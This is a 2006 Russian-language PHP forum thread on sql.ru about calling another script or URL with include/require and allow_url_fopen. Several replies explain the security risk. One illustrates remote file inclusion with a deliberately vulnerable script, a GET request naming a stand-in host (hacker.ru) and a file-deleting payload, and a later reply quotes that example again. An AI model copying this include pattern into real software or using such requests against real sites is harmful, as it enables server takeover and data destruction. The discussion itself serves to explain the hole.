(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL? / PHP, Perl, Python

ReSQL.ru

Мобильная версия Контакт Правила FAQ Помощь

Гость

Войти | Регистрация | Профиль | Очистить

Новые сообщения | Избранное

Форумы | Пользователи | Статистика | Мод. лог | Поиск

Цитировать

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вложение:

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Доб. в избранное | Игнор. тему | Прикреп. тему | Пометить прочит. / непрочит. | Фильтр

Форумы / PHP, Perl, Python [игнор отключен] [закрыт для гостей] / (PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?

11 сообщений из 11, страница 1 из 1

(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?

#33487064

DIEV.ru

Гость

Как внутри скрипта сделать прямой вызов друго скрипта или URL?

Код: plaintext

1.
2.

<?
  [перейти на www.sql.ru]
?>

как это будет выглядеть?

...

Рейтинг:

0 / 0

17.01.2006, 13:34

| Ответить | Цитировать | Написать

(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?

#33487186

Еретик

Участник

Сообщения: 147

Рейтинг: 0 / 0

Код: plaintext

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.

<?php

require 'prepend.php';

require $somefile;

require ('somefile.txt');

?>

Или то же самое с include()

URL можно вызывать, если для виртуального хоста или глобально установлен флаг allow_url_fopen (в php.ini или в конфигурационных файлах апача - httpd.conf, .htaccess)

Код: plaintext

 allow_url_fopen On

...

Рейтинг:

0 / 0

17.01.2006, 14:07

| Ответить | Цитировать | Написать

(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?

#33487187

lissyara

Участник

Откуда: Made in USSR

Сообщения: 5 644

Рейтинг: 0 / 0

Определитесь, что нужно - на мой взгляд несколько разные задачи.....

Posted via ActualForum NNTP Server 1.3

...

Рейтинг:

0 / 0

17.01.2006, 14:07

| Ответить | Цитировать | Написать

(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?

#33487258

lissyara

Участник

Откуда: Made in USSR

Сообщения: 5 644

Рейтинг: 0 / 0

Не успел :)

Posted via ActualForum NNTP Server 1.3

...

Рейтинг:

0 / 0

17.01.2006, 14:26

| Ответить | Цитировать | Написать

(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?

#33487786

Еретик

Участник

Сообщения: 147

Рейтинг: 0 / 0

Еретик

Код: plaintext

 allow_url_fopen On

Забыл сказать, что это дыра в безопасности, особенно если еще register_globals On

...

Рейтинг:

0 / 0

17.01.2006, 16:55

| Ответить | Цитировать | Написать

(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?

#33488091

DocAl

Участник

Откуда: Оккупирую западный берег

Сообщения: 9 935

Рейтинг: 0 / 0

С регистер_глобалс он -- это всё одна сплошная дыра...

...

Рейтинг:

0 / 0

17.01.2006, 18:23

| Ответить | Цитировать | Написать

(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?

#33488306

twistfire

Участник

Откуда: Украина

Сообщения: 744

Рейтинг: 0 / 0

а не могли бы Вы объяснить - почему когда register_globals=on то это дыра?
Из-за чего? По причине возможности атак на скрипті которіе воспринимают парпметрі, либо по какой-то другой?

...

Рейтинг:

0 / 0

17.01.2006, 21:54

| Ответить | Цитировать | Написать

(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?

#33488320

Гость

twistfireа не могли бы Вы объяснить - почему когда register_globals=on то это дыра?
www.php.net/registerglobals

...

Рейтинг:

0 / 0

17.01.2006, 22:21

| Ответить | Цитировать | Написать

(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?

#33488383

Еретик

Участник

Сообщения: 147

Рейтинг: 0 / 0

twistfireа не могли бы Вы объяснить - почему когда register_globals=on то это дыра?
Из-за чего? По причине возможности атак на скрипті которіе воспринимают парпметрі, либо по какой-то другой?

total_hole.php на www.your-host.ru:

Код: plaintext

1.
2.
3.

<?php
include $somefile
?>

Вызываем:

GET http://www.your-host.ru/total_hole.php?somefile=http://www.hacker.ru/envy.txt

envy.txt на www.hacker.ru:

Код: plaintext

1.
2.
3.

<?
 unlink(*.*);
?>

...

Рейтинг:

0 / 0

18.01.2006, 00:15

| Ответить | Цитировать | Написать

(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?

#33488493

Гость

Еретик twistfireа не могли бы Вы объяснить - почему когда register_globals=on то это дыра?
Из-за чего? По причине возможности атак на скрипті которіе воспринимают парпметрі, либо по какой-то другой?

total_hole.php на www.your-host.ru:

Код: plaintext

1.
2.
3.

<?php
include $somefile
?>

Вызываем:

GET http://www.your-host.ru/total_hole.php?somefile=http://www.hacker.ru/envy.txt

envy.txt на www.hacker.ru:

Код: plaintext

1.
2.
3.

<?
 unlink(*.*);
?>

А при чём тут register_globals? Дыра-то не в ней. Ну напишете вы

Код: plaintext

<?include $_GET['somefile']?>

- в плане безопасности это ничего не изменит (с тем же успехом $_POST/$_COOKIE/$_REQUEST).

...

Рейтинг:

0 / 0

18.01.2006, 07:53

| Ответить | Цитировать | Написать

(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?

#33488666

twistfire

Участник

Откуда: Украина

Сообщения: 744

Рейтинг: 0 / 0

усе равно спасибо :)

...

Рейтинг:

0 / 0

18.01.2006, 10:07

| Ответить | Цитировать | Написать

11 сообщений из 11, страница 1 из 1

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=23&msg=33488091&tid=1476939]:	0ms
get settings:	10ms
get forum list:	19ms
check forum access:	4ms
check topic access:	4ms
track hit:	197ms
get topic data:	11ms
get forum data:	3ms
get page messages:	70ms
get tp. blocked users:	1ms
others:	248ms

total:	567ms

	Необходимые cookie
	Cookie для сбора статистики
	Cookie для маркетинга и рекламы